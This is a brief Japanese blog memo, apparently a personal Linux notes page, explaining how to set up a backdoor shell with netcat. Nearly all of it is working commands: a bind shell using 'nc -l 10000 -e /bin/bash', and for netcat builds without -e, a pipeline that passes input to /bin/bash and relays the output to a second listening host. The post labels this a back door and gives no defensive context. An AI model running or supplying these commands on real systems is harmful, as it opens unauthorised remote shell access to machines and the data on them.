うまいぼうぶろぐ

linuxとhttpdとperlのメモ

ncでback door

portは適当

"-e" optionが使える場合

packageのncでは使えないのでcompile必要。

  • server
$ nc -l 10000 -e /bin/bash

  • client
$ nc server_ip 10000 

bashに接続

"-e" optionが使えない場合

入力用と、出力用のshellをわけて、pipe を通す

準備
  • client 端末1

出力用のnc

$ nc -l 10000

準備。
次のserverから送られた出力を受け取って表示する用

  • server
$ nc -l 20000 | /bin/bash | nc client_ip 10000

※ やっていること: 20000番でlisten して、入力された内容をbash に渡して、その出力はnc経由で client の10000番に送信

実行

  • client 端末2 から接続
$ nc server_ip 20000

serverでlisten しているbashに接続 。

client 端末2 でコマンドを実行すると、出力がclient 端末1 に表示される。